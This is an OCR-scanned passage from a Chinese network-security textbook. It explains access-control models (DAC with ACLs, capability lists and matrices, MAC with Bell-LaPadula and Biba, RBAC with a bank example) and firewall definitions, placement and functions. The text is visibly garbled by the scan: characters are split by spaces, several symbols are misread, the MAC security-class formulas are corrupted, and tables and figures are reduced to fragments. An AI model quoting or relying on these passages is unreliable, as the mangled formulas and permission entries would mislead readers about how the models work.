滥用 资源 以 达到 占用 资源 的 目的 ; @ 谁 能 够 获得 可 以 用 于 拒绝 服务 攻击 的 信息 。 

在 访问 控制 中 ,实体 用 主体 和 客体 来 描述 ,而 规则 则 用 控制 策略 来 表示 ,从 而 构成 了 访 
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4-1 访问 控制 示意 图 


问 控制 的 3 个 要 素 , 即 主体 、 客 体 和 控制 策略 。 

(D 主体 (Subject) : 发 起 操作 请 求 的 实体 ,如 进程 。 

© 客体 (Object) : 也 称 为 对 象 ,是 主体 作用 的 实体 ,如 文件 .设备 .进程 之 类 的 资源 。 

© 控制 策略 (Access Control Policy); 是 主体 对 客体 的 操作 行为 集 和 约束 条 件 集 。 

简单 地 讲 ,访问 控制 策略 是 主体 对 客体 的 访问 规则 集合 ,这 个 规则 集合 可 以 直接 决定 主 
体 是 否 可 以 对 客体 实施 的 特定 操作 。 访 问 控制 策略 体现 了 一 种 授权 行为 ,也 就 是 客体 对 主 
体 的 权限 允许 。 访 问 控制 策略 往往 表现 为 一 系列 的 访问 规则 ,这 些 规 则 定义 了 主体 对 客体 
的 作用 行为 和 客体 对 主体 的 条 件 约束 。 访 问 控制 机 制 是 访问 控制 策略 的 软 硬 件 低 层 实现 。 

访问 控制 是 为 了 限制 访问 主体 对 访问 客体 的 访问 权限 ,从 而 使 计算 机 系统 在 合法 范围 
内 使 用 。 为 了 达到 访问 控制 的 目的 ,访问 控制 必须 包括 以 下 两 个 过 程 。 

(D 认证 : 校 验 主体 的 合法 身份 。 

@ 授权 : 限制 用 户 对 资源 的 访问 级 别 。 

具体 的 访问 级 别 包括 读 取 数据 .更改 数据 .运行 程序 ,发 起 连接 等 。 根 据 应 用 环境 的 不 
同 ,访问 控制 可 分 为 网 络 访问 控制 、 主 机 操作 系统 访问 控制 和 应 用 程序 访问 控制 等 。 根 据 实 
现 的 基本 理念 不 同 , 访 问 控 制 可 分 为 自主 访问 控制 (Discretionary Access Control, DAC)、 
强制 访问 控制 (Mandatory Access Control, MAC) 和 基于 角色 的 访问 控制 (Role Based 
Access Control.RBAC) 。 

如 图 4-1 所 示 ,主体 对 于 客体 的 每 一 次 访问 ,访问 控制 系统 均 要 审核 该 次 访问 操作 是 和 否 
守 合 访问 控制 策略 ,只 允许 符合 访问 控制 策略 的 操作 请 求 ,拒绝 那些 违反 控制 策略 的 非法 访 
问 。 访 问 控制 可 以 解释 为 : 依据 一 定 的 访问 控制 策略 ,实施 对 主体 访问 客体 的 控制 。 

图 4-1 也 给 出 了 访问 控制 系统 的 两 个 主要 工作 : 一 个 是 当主 体 发 出 对 客体 的 访问 请 求 
时 ,查询 相关 的 访问 控制 策略 ; 另 一 个 是 依据 访问 控制 策略 执行 访问 控制 。 

通过 以 上 分 析 可 以 看 出 ,影响 访问 控制 系统 实施 效果 好 坏 的 首要 因素 是 访问 控制 策略 ， 
制定 访问 控制 策略 的 过 程 实际 上 就 是 为 主体 对 客体 的 访问 授权 过 程 。 如 何 较 好 地 完成 对 主 
体 的 授权 是 访问 控制 成 功 与 否 的 关键 ,同时 也 是 访问 控制 必须 研究 的 重要 课题 。 

如 何 决定 主体 对 客体 的 访问 权限 ? 一 个 主体 对 一 个 客体 的 访问 权限 能 否 转 让 给 其 他 主 
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体 呢 ? 这些 问题 在 访问 控制 策略 中 必须 给 出 明确 的 回答 。 

1. 访问 控制 策略 制定 的 原则 

访问 控制 策略 的 制定 一 般 要 满足 以 下 两 项 基本 原则 。 

(1) 最 小 权限 原则 。 分 配给 系统 中 的 每 一 个 程序 和 每 一 个 用 户 的 权限 应 该 是 它们 完成 
工作 所 必须 享有 的 权限 的 最 小 集合 。 换 句 话说 ,如 果 主 体 不 需要 访问 特定 客体 , 则 主体 就 不 
应 该 拥有 访问 这 个 客体 的 权限 。 

(2) 最 小 泄露 原则 。 主 体 执 行 任务 时 所 需 知道 的 信息 应 该 最 小 化 。 

2. 访问 权限 的 确定 过 程 
主体 对 客体 的 访问 权限 的 确定 过 程 是 : 首先 对 用 户 和 资源 进行 分 类 ,然后 对 需要 保护 
的 资源 定义 一 个 访问 控制 包 , 最 后 根据 访问 控制 包 来 制定 访问 控制 规则 集 。 

3. 用 户 分 类 

通常 把 用 户 分 为 特殊 用 户 .一 般 用 户 、 作 审计 的 用 户 和 作废 的 用 户 。 

(1) 特殊 用 户 。 系 统管 理 员 具有 最 高 级 别 的 特权 ,可 以 访问 任何 资源 ,并 具有 任何 类 型 
的 访问 操作 能 力 。 

(2) 一 般 的 用 户 。 最 大 的 一 类 用 户 ,他 们 的 访问 操作 受到 一 定 限制 ,由 系统 管理 员 
分 配 。 

(3) 作 审 计 的 用 户 。 负 责 整 个 安全 系统 范围 内 的 安全 控制 与 资源 使 用 情况 的 审计 。 

(4) 作废 的 用 户 。 被 系统 拒绝 的 用 户 。 

4. 资源 的 分 类 

系统 内 需要 保护 的 资源 包括 磁盘 与 磁带 卷 标 、 数 据 库 中 的 数据 、 应 用 资源 、 远 程 终端 \ 信 
息 管理 系统 的 事务 处 理 及 其 应 用 等 。 

5. 对 需要 保护 的 资源 定义 一 个 访问 控制 包 

内 容 包 括 资源 名 及 拥有 者 的 标识 符 、 默 认 访 问 权 、 用 户 和 用 户 组 的 特权 明细 表 、 人 允许 资 
源 的 拥有 者 对 其 添加 新 的 可 用 数据 的 操作 ,审计 数据 等 。 

6. 访问 控制 规则 集 

访问 控制 规则 集 是 根据 第 5 步 的 访问 控制 包 得 到 的 , 它 规 定 了 若干 条 件 和 在 这 些 条 件 
下 允许 访问 的 一 个 资源 。 规 则 使 得 用 户 与 资源 配对 ,并 指定 该 用 户 可 在 该 文件 上 执行 哪些 
操作 ,如 只 读 , 不 许 执行 或 不 许 访问 。“ 主 体 对 客体 的 访问 权限 能 否 转 让 给 其 他 主体 ”这 一 问 
题 则 比较 复杂 ,不 能 简单 地 用 “能 "和 “不 能 "来 回答 。 大 家 试想 一 下 ,如 果 回 答 “ 不 能 ” ,表面 
上 看 很 安全 ,但 按照 这 一 控制 策略 做 出 系统 后 ,就 不 可 能 实现 任何 信息 的 共享 了 。 


4.1.2 自主 访问 控制 


一 种 策略 是 对 某 个 客体 具有 所 有 权 的 主体 能 够 自主 地 将 对 该 客体 的 一 种 访问 权 或 多 种 
访问 权 授予 其 他 主体 ,并 可 在 随后 的 任何 时 刻 将 这 些 权限 收回 ,这 一 策略 称 为 自主 访问 控 
制 。 这 种 策略 因 灵 活性 高 ,在 实际 系统 中 被 大 量 采用 。Linux、UNIX 和 Windows 等 系统 都 
提供 了 自主 访问 控制 功能 。 在 实现 自主 访问 控制 策略 的 系统 中 ,信息 在 移动 过 程 中 其 访问 
权限 关系 会 被 改变 。 如 用 户 A 可 将 其 对 目标 O 的 访问 权限 传递 给 用 户 B, 从 而 使 本 身 不 具 
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# O 访问 权限 的 了 可 访问 O。 因 此 ,这 种 模型 提供 的 安全 防护 不 能 给 系统 提供 充分 的 数 
据 保护 。 

自主 访问 控制 模型 (DAC Model) 是 根据 自主 访问 控制 策略 建立 的 一 种 模型 ,允许 合法 
用 户 以 用 户 或 用 户 组 的 身份 来 访问 系统 控制 策略 许可 的 客体 ,同时 阻止 非 授权 用 户 访 问 客 
体 , 某 些 用 户 还 可 以 自主 地 把 自己 所 拥有 的 客体 的 访问 权限 授予 其 他 用 户 。 在 自主 访问 控 
制 系统 中 ,特权 用 户 为 普通 用 户 分 配 的 访问 权限 信息 主要 以 访问 控制 表 (Access Control 
Lists, ACL) ,访问 控制 能 力 表 (Access Control Capability Lists, ACCL) 和 访问 控制 矩阵 
(Access Control Matrix, ACM)3 种 形式 来 存储 。 

ACL 是 以 客体 为 中 心 建立 的 访问 权限 表 , 其 优点 在 于 实现 简单 ,系统 为 每 个 客体 确定 
一 个 授权 主体 的 列表 ,大 多 数 主机 都 是 用 ACL 作为 访问 控制 的 实现 机 制 。 图 4-2 所 示 为 
ACL 示例 ,(Own,R,W) 表 示 读 、 写 .管理 操作 。 之 所 以 将 管理 操作 从 读 / 写 中 分 离 出 来 ,是 
因为 管理 员 会 对 控制 规则 本 身 或 文件 属性 等 进行 修改 , 即 修改 ACL。 例 如 ,对 于 客体 
Objectl 3E UE. Alice 对 它 的 访问 权限 集合 为 (Own,R,W),Bob 只 有 读 取 权限 (R) ,John 拥 
有 读 、 写 操作 的 权限 (R,W) 。 
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4-2 ACL 示例 


图 4-3 所 示 为 ACCL 示例 。ACCL 是 以 主体 为 中 心 建立 的 访问 权限 表 。“ 能 力 ” 这 个 概 
念 可 以 解释 为 请 求 访问 的 发 起 者 所 拥有 的 一 个 授权 标签 ,授权 标签 表明 持 有 者 可 以 按照 某 
种 访问 方式 访问 特定 的 客体 。 也 就 是 说 ,如 果 赋 予 某 个 主体 一 种 能 力 , 那 么 这 个 主体 就 具有 
与 该 能 力 对 应 的 权限 。 在 此 示例 中 ,Alice 被 赋予 一 定 的 访问 控制 能 力 , 其 具有 的 权限 包括 ， 
对 Objectl 拥有 的 访问 权限 集合 为 (Own,R,W) .对 Object2 WA REIRE. X Object3 
拥有 读 和 写 的 权限 (R,W)。 

ACM 是 通过 和 矩阵 形式 表示 主体 用 户 和 客体 资源 之 间 的 授权 关系 的 方法 。 表 4-1 所 示 
为 ACM 示例 ,采用 二 维 表 的 形式 来 存储 访问 控制 策略 ,每 一 行为 一 个 主体 的 访问 能 力 描 
述 ,每 一 列 为 一 个 客体 的 访问 能 力 描 述 ,整个 和 矩阵 可 以 清晰 地 体现 出 访问 控制 策略 。 与 
ACL 和 ACCL 一 样 ,ACM 的 内 容 同样 需要 特权 用 户 或 特权 用 户 组 来 进行 管理 。 男 外 ,如 
果 主 体 和 客体 很 多 ,那么 ACM 将 会 呈 几 何 级 数 增长 ,这 样 对 于 增长 了 的 矩阵 而 言 ,会 有 大 
量 的 元 余 空间 ,如 主体 John 和 客体 Object? 之 间 没 有 访问 关系 ,但 存在 授权 关系 项 。 





第 4 章 防火 墙 技术 137 




































































Objectl Objec2 | Object3 
Own 
e—a l V]: 
A w 
Alice = 
Pointer Pointer Pointer 
Objectl Object3 | 
Own 
à&—:/^ 
w 
Bob Pointer Pointer 
Object2 Object3 | 
Own 
& - `° 
w 
John Pointer Pointer 
4-3 ACCL 示例 
R 4-1 ACM 实例 
客体 
主体 : z 
Object1 Object2 Object3 
Alice Own. R. W R R.W 
Bob R Own,R,W 
John R.W Own,R,W 











DAC 对 用 户 提供 了 灵活 的 数据 访问 方式 ,授权 主体 (特权 用 户 、 特 权 用 户 组 的 成 员 以 及 
对 客体 拥有 Own 权限 的 主体 ) 均 可 以 完成 赋予 和 回收 其 他 主体 对 客体 资源 的 访问 权限 ,使 
得 DAC 广泛 应 用 于 商业 和 工业 环境 中 。 但 由 于 DAC 允许 用 户 任意 传递 权限 ,没有 访问 文 
件 filel 权限 的 用 户 A 可 能 从 有 访问 权限 的 用 户 B 那里 得 到 访问 权限 ,因此 ,DAC 模型 提供 
的 安全 防护 还 是 相对 比较 低 的 ,不 能 为 系统 提供 充分 的 数据 保护 。 


4.1.3 强制 访问 控制 


另 一 种 策略 是 根据 主体 被 信任 的 程度 和 客体 所 含 信息 的 机 密 性 和 敏感 程度 来 决定 主体 
对 客体 的 访问 权限 。 用 户 和 客体 都 被 赋予 一 定 的 安全 级 别 , 用 户 不 能 改变 自身 和 客体 的 安 
全 级 别 , 只 有 管理 员 才 能 确定 用 户 的 安全 级 别 且 当主 体 和 客体 的 安全 级 别 满足 一 定 的 规则 
时 才 允 许 访问。 这 一 策略 称 为 强制 访问 控制 。 在 强制 访问 控制 模型 中 ,一 个 主体 对 某 客体 
的 访问 权 只 能 有 条 件 地 转让 给 其 他 主体 ,而 这 些 条 件 是 非常 严格 的 。 例 如 ,Bell-LaPadula 
模型 规定 ,安全 级 别 高 的 用 户 和 进程 不 能 向 比 他 们 安全 级 别 低 的 用 户 和 进程 写 入 数据 。 
Bell-LaPadula 模型 的 访问 控制 原则 可 简单 地 表示 为 “无 上 读 、 无 下 写 ”, 该 模型 是 第 一 个 将 
安全 策略 形式 化 的 数学 模型 ,是 一 个 状态 机 模型 , 即 用 状态 转换 规则 来 描述 系统 的 变化 过 
程 。Lattice 模型 和 Biba 模型 也 属于 强制 访问 控制 模型 。 强 制 访问 控制 一 般 通 过 安全 标签 
来 实现 单 向 信息 流通 。 

强制 访问 控制 MAC 是 一 种 多 级 访问 控制 策略 ,系统 事先 给 访问 主体 和 受 控 客 体 分 配 
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不 同 的 安全 级 别 属性 ,在 实施 访问 控制 时 ,系统 先 对 访问 主体 和 受 控 客体 的 安全 级 别 属 性 进 
行 比较 ,再 决定 访问 主体 能 否 访问 该 受 控 客 体 。 为 了 对 MAC 模型 进行 形式 化 描述 ,首先 需 
要 将 访问 控制 系统 中 的 实体 对 象 分 为 主体 集 S 和 客体 集 0 ,然后 定义 安全 类 SCGO — —L. 
C>, 其 中 了 为 特定 的 主体 或 客体 ,L 为 有 层次 的 安全 级 别 Level, C 为 无 层次 的 安全 范畴 
Category。 在 安全 类 SC 的 两 个 基本 属性 L 和 C 中 ,安全 范畴 C 用 来 划分 实体 对 象 的 归属 ， 
而 同属 于 一 个 安全 范畴 的 不 同 实体 对 象 由 于 具有 不 同 层 次 的 安全 级 别 工 ,因而 构成 了 一 定 
的 偏 序 关 系 。 例 如 ,TS(Top Secret) 表 示 绝 密级 ,S(Secret) 表 示 秘 密级 ,当主 体 s 的 安全 类 
别 为 TS, 而 客体 o 的 安全 类 别 为 S 时 ,* 与 o 的 偏 序 关 系 可 以 表述 为 SC(s) 三 SC(o)。 依 靠 
不 同 实体 安全 级 别 执行 存在 的 偏 序 关系 ,主体 对 客体 的 访问 可 以 分 为 以 下 4 种 形式 。 

CD 向 下 读 (Read Down. RD); 主体 安全 级 别 高 于 客体 信息 资源 的 安全 级 别 时 , 即 
SCG) SSC Co) ,允许 读 操作 。 

(2) 向 上 读 (Read Up,RU): 主体 安全 级 别 低 于 客体 信息 资源 的 安全 级 别 时 , 即 SCC < 
SCCO ,允许 读 操作 。 

(3) 向 下 写 (Write Down, WD): SC(s) 宇 SC(o) 时 ,允许 写 操 作 。 

(4) 向 上 写 (Write Up. WU): SC(s) 志 SC(0) 时 ,允许 写 操作 。 

由 于 MAC 通过 分 级 的 安全 标签 实现 了 信息 的 单 向 流动 ,因此 它 一 直 被 军 方 采用 ,其 中 
最 著名 的 是 Bell-LaPadula 模型 和 Biba 模型 。Bell-LaPadula 模型 具有 只 允许 向 下 读 、 向 上 
写 的 特点 ,可 以 有 效 防止 机 密 信息 向 下 级 泄露 ,保护 机 密 性 ; Biba 模型 则 具有 只 允许 向 上 
读 、 向 下 写 的 特点 ,可 以 有 效 地 保护 数据 的 完整 性 。 

K 4-2 所 列 为 MAC 信息 流 控制 ,从 中 可 以 看 出 机 密 层 次 的 主体 对 于 比 它 密级 高 的 客 
体 , 它 只 有 写 操作 权限 ; 而 对 于 比 它 级 别 低 的 客体 , 则 拥有 读 操 作 权限 。 这 符合 RD 和 
WU ,与 Bell-LaPadula 模型 的 信息 流 控制 一 致 ,可 以 保证 信息 的 机 密 性 。 

R42 MAC 信息 流 安全 控制 


























客体 
= TS c s U 高 
TS R/W R R R Y 
C w R/W R R Y 
s w w R/W R Y 
U w w w R/W 低 











ik: 绝密 (Top Secret, TS) | HLE (Confidential, C) ,秘密 (Secret,S) ,无 密 (Unclassified,U)。 


4.1.4. 基于 角色 的 访问 控制 


将 访问 权限 分 配给 一 定 的 角色 ,用 户 根据 自己 的 角色 获得 相应 的 访问 许可 权 , 这 便 是 基 
于 角色 的 访问 控制 策略 。 角 色 是 指 一 个 可 以 完成 一 定 职能 的 命名 组 。 角 色 与 组 是 有 区 别 
的 ,组 是 一 组 用 户 的 集合 ,而 角色 是 一 组 用 户 集合 外 加 一 组 操作 权限 的 集合 。 一 般 认 为 ， 
Group 是 具有 某 些 相同 特质 的 用 户 集合 。 在 UNIX 操作 系统 中 ,Group 可 以 被 看 成 是 拥有 
相同 访问 权限 的 用 户 集合 ,定义 用 户 组 时 会 为 该 组 赋予 相应 的 访问 权限 。 如 果 一 个 用 户 加 
入 了 该 组 , 则 该 用 户 即 具有 了 该 用 户 组 的 访问 权限 ,可 以 看 出 组 内 用 户 继承 了 组 的 权限 。 

如 图 4-4 所 示 , 角 色 Role 的 概念 可 以 这 样 理解 一 个 角色 是 一 个 与 特定 工作 活动 相关 联 
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的 行为 与 责任 的 集合 。Role 不 是 用 户 的 集合 ,也 就 与 Group 不 同 。 当 将 一 个 角色 与 一 个 组 
绑 定 , 则 这 个 组 就 拥有 了 该 角色 拥有 的 特定 工作 的 行为 能 力 和 责任 。 组 Group 和 用 户 User 
都 可 以 看 成 是 角色 分 配 的 单位 和 载体 。 而 一 个 角色 Role 可 以 看 成 具有 某 种 能 力 或 某 些 属 
性 的 主体 的 一 个 抽象 。 








44 基于 角色 的 访问 控制 模型 


Role 的 目的 是 为 了 隔离 用 户 (Subject ,动作 客体 ) 与 Privilege( 权 限 , 指 对 客体 ) 的 一 个 
访问 操作 , 即 操作 (Operation) 十 客体 对 象 (Object) 。Role 作为 一 个 用 户 与 权限 的 代理 层 ， 
所 有 的 授权 应 该 给 予 Role 而 不 是 直接 给 User 或 Group。RBAC 模型 的 基本 思想 是 将 访问 
权限 分 配给 一 定 的 角色 ,用 户 通过 饰演 不 同 的 角色 获得 角色 所 拥有 的 访问 许可 权 。 

在 基于 角色 的 访问 控制 模型 中 ,只 有 系统 管理 员 才 能 定义 和 分 配角 色 ,用 户 不 能 自主 地 
将 对 客体 的 访问 权 转 让 给 别 的 用 户 。 比 较 而 言 , 自 主 访问 控制 配置 的 力度 小 ,配置 的 工作 量 
A o IK ,强制 访问 控制 配置 的 力度 大 、 缺 乏 灵活 性 ,而 基于 角色 的 访问 控制 策略 是 与 现代 
的 商业 环境 相 结合 的 产物 ,具有 灵活 ,方便 和 安全 的 特点 ,是 实施 面向 企业 安全 策略 的 一 种 
有 效 的 访问 控制 方式 ,目前 常用 于 大 型 数据 库 系统 的 权限 管理 。 

下 面 介绍 一 个 基于 角色 的 访问 控制 实例 。 

在 银行 环境 中 ,用 户 角 色 可 以 定义 为 出 纳 员 、 分 行 管理 者 、 顾 客 、 系 统管 理 者 和 审计 员 ， 
相应 的 访问 控制 策略 可 规定 如 下 。 

(D 允许 一 个 出 纳 员 修 改 顾客 的 账号 记录 (包括 存款 和 取款 、 转 账 等 ) ,并 允许 查询 所 有 
账号 的 注册 项 。 

@ 允许 一 个 分 行 管理 者 修改 顾客 的 账号 记录 (包括 存款 和 取款 ,但 不 包括 规定 的 资金 
数目 的 范围 ), 并 允许 查询 所 有 账号 的 注册 项 ,也 允许 创建 和 终止 账号 。 

@ 允许 一 个 顾客 只 询问 他 自己 的 账号 的 注册 项 。 

D 允许 系统 的 管理 者 询问 系统 的 注册 项 和 开关 系统 ,但 不 允许 读 或 修改 用 户 的 账号 信息 。 

@ 允 许 一 个 审计 员 读 系统 中 的 任何 数据 ,但 不 允许 修改 任何 数据 。 该 策略 陈述 易于 被 
非 技 术 的 组 织 策略 者 理解 ,同时 也 易于 映射 到 访问 控制 矩阵 或 基于 组 的 策略 陈述 。 另 外 ,该 
策略 还 同时 具有 基于 身份 策略 的 特征 和 基于 规则 策略 的 特征 。 

基于 角色 的 访问 控制 具有 以 下 优势 。 

CD 便于 授权 管理 。 例 如 ,系统 管理 员 需 要 修改 系统 设置 等 内 容 时 ,必须 有 几 个 不 同 角 
色 的 用 户 到 场 方 能 操作 ,从 而 保证 了 安全 性 。 

© 便于 根据 工作 需要 分 级 。 例 如 ,企业 财务 部 门 与 非 财务 部 门 的 员工 对 企业 财务 的 访 
问 权 就 可 由 财务 人 员 这 个 角色 来 区 分 。 

@ 便于 赋予 最 小 特权 。 例 如 ,即使 用 户 被 赋予 高 级 身份 时 也 未 必 一 定 要 使 用 ,以 便 减 
少 损失 ,只 有 必要 时 方 能 拥有 特权 。 

CD 便于 任务 分 担 , 不 同 的 角色 完成 不 同 的 任务 。 在 基于 角色 的 访问 控制 中 ,一 个 个 人 
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用 户 可 能 是 不 止 一 个 组 或 角色 的 成 员 , 有 时 又 可 能 有 所 限制 。 

C) 便于 文件 分 级 管理 。 文 件 本 身 也 可 分 为 不 同 的 角色 ,如 信件 、 账 单 等 ,由 不 同 角 色 的 
用 户 拥有 。 

在 各 种 访问 控制 系统 中 ,访问 控制 策略 的 制定 和 实施 都 是 围绕 主体 、 客 体 和 操作 权限 三 
者 之 间 的 关系 展开 。 有 以 下 3 个 基本 原则 是 制定 访问 控制 策略 时 必须 遵守 的 。 

CD. 最 小 特权 原则 ,是 指 主体 执行 操作 时 ,按照 主体 所 需 权 利 的 最 小 化 原则 分 配给 主体 
权力 。 最 小 特权 原则 的 优点 是 最 大 限度 地 限制 了 主体 实施 授权 行为 ,可 以 避免 来 自 突 发 事 
件 和 错误 操作 带 来 的 危险 。 

© 最 小 泄露 原则 ,是 指 主体 执行 任务 时 ,按照 主体 所 需要 知道 信息 的 最 小 化 原则 分 配 
给 主体 访问 权限 。 

O 多 级 安全 策略 ,是 指 主体 和 客体 间 的 数据 流 方向 必须 受到 安全 等 级 的 约束 。 多 级 安 
全 策略 的 优点 是 避免 敏感 信息 的 扩散 。 对 于 具有 安全 级 别 的 信息 资源 ,只 有 安全 级 别 比 它 
高 的 主体 才能 够 对 其 进行 访问 。 





E 


4.2 防火 墙 的 原理 


防火 墙 (Firewall) 是 目前 一 种 最 重要 的 网 络 防护 设备 ,从 专业 角度 讲 , 防 火 墙 是 位 于 两 
个 (或 多 个 ) 网 络 之 间 ,实施 网 络 之 间 访 问 控制 的 一 组 组 件 集合 。 


4.2.1 防火 墙 的 定义 


防火 墙 是 隔离 在 内 部 网 络 与 外 部 网 络 边界 的 一 道 防御 系统 , 它 可 以 使 企业 内 部 局 域 网 
与 Internet 之 间或 者 与 其 他 外 部 网 络 互 相隔 离 .限制 网 络 互 访 来 保护 内 部 网 络 。 

防火 墙 的 法宝” 是 访问 控制 策略 。 访 问 控制 策略 是 控制 内 部 主机 进行 网 络 访问 的 原则 
和 措施 , 即 人 允许 哪 一 台 内 部 主机 以 什么 样 的 方式 访问 外 部 网 络 ,允许 外 部 主机 以 什么 样 的 方 
式 访问 内 部 网 络 。 访 问 控制 策略 是 依据 企业 或 组 织 的 整体 安全 策略 制定 的 ,是 企业 或 组 织 
对 网 络 与 信息 安全 的 观点 与 思想 的 表达 ,具体 体现 为 防火 墙 的 过 滤 规则 。 防 火 墙 依据 过 滤 
规则 检查 每 个 经 过 它 的 数据 包 ,符合 过 滤 规 则 的 数据 包 人 允许 通过 ,不 符合 过 滤 规 则 的 数据 包 
一 律 拒绝 其 通过 防火 墙 。 

从 广泛 .宏观 的 意义 上 说 ,防火 墙 是 隔离 在 内 部 网 络 与 外 部 网 络 之 间 的 一 个 防御 系统 。 
防火 墙 拥有 内 联网 络 与 外 联网 络 之 间 的 唯一 进出 口 ,因此 能 够 使 内 联网 络 与 外 联网 络 ,尤其 
是 与 Internet 相互 隔离 。 它 通过 限制 内 联网 络 与 外 联网 络 之 间 的 访问 来 防止 外 部 用 户 非法 
使 用 内 部 资源 ,保护 内 联网 络 的 设备 不 被 破坏 ,防止 内 联网 络 的 敏感 数据 被 窃取 ,从 而 达到 
保护 内 联网 络 的 目的 。 

防火 墙 是 位 于 两 个 网 络 之 间 的 一 组 构件 或 一 个 系统 ,具有 以 下 属性 。 

(1) 防火 墙 是 不 同 网 络 或 者 安全 域 之 间 信 息 流 的 唯一 通道 (如 图 4-5 所 示 ) ,所 有 双向 
数据 流 必 须 经 过 防火 墙 。 

(2) 只 有 经 过 授权 的 合法 数据 ( 即 防火 墙 安全 策略 允许 的 数据 ) 才 可 以 通过 防火 墙 ( 如 
图 4-6 所 示 ) 。 
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防火 墙 E 
图 4-5 防火墙 位 于 网 络 边界 


fi 


根据 安全 策略 ， Aene 
Intranet 的 流量 受到 阻塞 








根据 安全 策略 ， 从 Intranet 
到 Internet 的 流量 以 及 响应 的 
返回 流量 允许 通过 防火 墙 

















根据 安全 策略 ， 从 Internet 
来 的 特殊 类 型 的 流量 可 能 被 
允许 到 达 Intranet 
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图 4-6 ”防火墙 安全 策略 允许 的 数据 通过 


(3) 防火 墙 系统 应 该 具有 很 高 的 抗 攻击 能 力 , 其 自身 可 以 不 受 各 种 攻击 的 影响 


这 是 防火 墙 之 所 以 能 担当 企业 内 部 网 络 安 全 防护 重任 的 先决 条 件 ,这 就 要 求 防火 墙 自 
身 要 具有 非常 强 的 抗 攻 击 入 侵 本 领 。 具 体 来 说 ,首先 ,防火 墙 操 作 系 统 具 有 完整 的 信任 关 
系 ; 其 次 ,防火 墙 自身 具 有 非常 低 的 服务 功能 ,除了 专门 的 防火 墙 嵌 入 系统 外 ,再 没有 其 他 


应 用 程序 在 防火 墙 上 运行 。 


简 而 言 之 ,防火 墙 是 位 于 两 个 (或 多 个 ) 网 络 间 ,实施 访问 控制 策略 的 一 个 或 一 组 组 件 集 


合 。 防 火 墙 系统 如 图 4-7 所 示 。 
防火 墙 


ac 人 


部 网 络 
图 4-7 ”防火墙 系 统 示意 图 











部 网 络 
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4.2.2 防火 墙 的 位 置 


l. 防火 墙 的 物理 位 置 

从 物理 角度 看 ,防火墙 的 物理 实现 方式 有 所 不 同 。 通 常 来 说 ,防火 墙 是 一 组 硬件 设备 ， 
即 路 由 器 、 计 算 机 或 者 配 有 适当 软件 的 网 络 设备 的 多 种 组 合 。 作 为 内 部 网 络 与 外 部 网 络 之 
间 实 现 访 问 控制 的 一 种 硬件 设备 ,防火 墙 通常 部 署 在 内 部 网 络 与 外 部 网 络 的 交界 点 上 (如 
图 4-8 所 示 )。 从 具体 的 实现 上 看 ,防火墙 运行 在 任何 要 实现 访问 控制 功能 的 设备 上 。 





4-8 ”防火墙 在 网 络 中 的 常见 位 置 


从 具体 实现 角度 看 ,防火 墙 由 一 个 独立 的 进程 或 者 一 组 紧密 联系 的 进程 构成 。 它 运行 
在 路 由 器 .堡垒 主机 或 者 任何 提供 网 络 安全 的 设备 组 合 上 。 这 些 设 备 或 设备 组 一 边 连 接着 
受 保护 的 网 络 , 另 一 边 连接 着 外 部 网 络 或 者 内 部 网 络 的 DMZ (Demilitarized ZONE) 区 域 。 
防火 墙 在 这 些 关键 的 数据 交换 节点 或 者 网 络 接口 上 控制 着 经 过 它们 的 各 种 各 样 的 数据 流 ， 
并 且 为 安全 管理 提供 详细 的 系统 活动 记录 。 

再 次 强调 一 下 ,防火墙 不 是 万 能 的 ,为 了 保护 内 联网 络 的 安全 ,使 得 内 联网 络 免 受 威胁 
和 攻击 ,内 部 资源 不 被 非法 使 用 或 恶意 泄露 ,任何 网 络 之 间 交 换 的 数据 流 都 必须 通过 防火 
墙 ; 否则 将 无 法 对 数据 进行 监控 。 

2. 防火 墙 的 逻辑 位 置 

防火 墙 的 逻辑 位 置 指 的 是 防火 墙 与 网 络 协 议 相 对 应 的 逻辑 层次 关系 。 处 于 不 同 网 络 层 
次 的 防火 墙 实现 不 同 级 别 的 网 络 过 滤 功能 ,表现 出 的 特性 也 不 同 。 例 如 ,网 络 层 防火 墙 可 以 
进行 快速 的 数据 包 过 滤 , 但 是 却 无 法 理解 数据 包 内 容 的 含义 ,因此 无 法 进行 更 深入 的 内 容 检 
查 ; 代理 型 防火 墙 位 于 应 用 层 上 ,过滤 速 度 慢 , 但 是 可 以 理解 数据 包 内 容 的 含义 ,进而 能 够 
对 其 进行 更 加 深入 的 检测 和 控制 。 

防火 墙 的 目的 在 于 实现 访问 控制 策略 , 且 所 有 防火 墙 均 依赖 于 对 ISO OSI/RM 网 络 7 
层 模型 中 各 层 协议 所 产生 的 信息 流 进行 检查 。 一 般 来 说 ,防火 墙 越 是 工作 在 ISO OSI/RM 
模型 的 上 层 , 其 能 够 检查 的 信息 越 多 ,也 就 能 够 获得 更 多 的 信息 用 于 安全 政策 。 按 照 ISO 
OSI/RM 模型 ,防火 墙 可 以 设置 在 ISO OSI/RM 7 层 模型 的 5 层 , 如 表 4-3 所 示 。 
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表 4-3 防火墙 与 网 络 层次 关系 


























ISO OSI/RM 七 层 模型 防火 墙 级 别 
应 用 层 网 关 级 
表示 层 
会 话 层 
传输 层 电路 级 
网 络 层 路 由 器 级 
数据 链 路 层 网 桥 级 
物理 层 中 继 器 级 


4.2.3 防火 墙 的 功能 


1. 访问 控制 功能 

访问 控制 功能 ( 即 包 过 滤 功 能 ) 是 防火 墙 设备 最 基本 的 功能 ,其 作用 就 是 对 经 过 防火 墙 
的 所 有 通信 进行 连通 或 阻 断 的 安全 控制 ,以 实现 连接 到 防火 墙 上 的 各 个 网 段 的 边界 安全 性 。 
为 实施 访问 控制 ,可 以 根据 网 络 地 址 、 网 络 协议 以 及 TCP UDP 端口 进行 过 滤 ; 可 以 实施 简 
单 的 内 容 过 滤 ,如 电子 邮件 附件 的 文件 类 型 等 ; 可 以 将 IP 与 MAC 地 址 绑 定 以 防止 盗用 IP 
的 现象 发 生 ; 可 以 对 上 网 时 间 段 进行 控制 ,不 同时 段 执行 不 同 的 安全 策略 ; 可 以 对 VPN 通 
信 进 行 安全 控制 ; 可 以 有 效 地 对 用 户 进行 带宽 流量 控制 。 访 问 控制 的 基本 功能 如 图 4-9 
所 示 。 


. 基于 源 端口 Access list 192.168.1.3 to 202.2.33.2 
. 基于 目的 端口 Access nat 192.168.3.0 to any pass 
5. 基于 时 间 Access 202.1.2.3 to 192.168.1.3 block 
. 基于 用 户 Access default pass 
. 基于 流量 规则 匹配 成 功 


主机 C 主机 D 





11010110 0. 基于 MAC 地 址 


zi 





4-9 访问 控制 功能 示意 图 


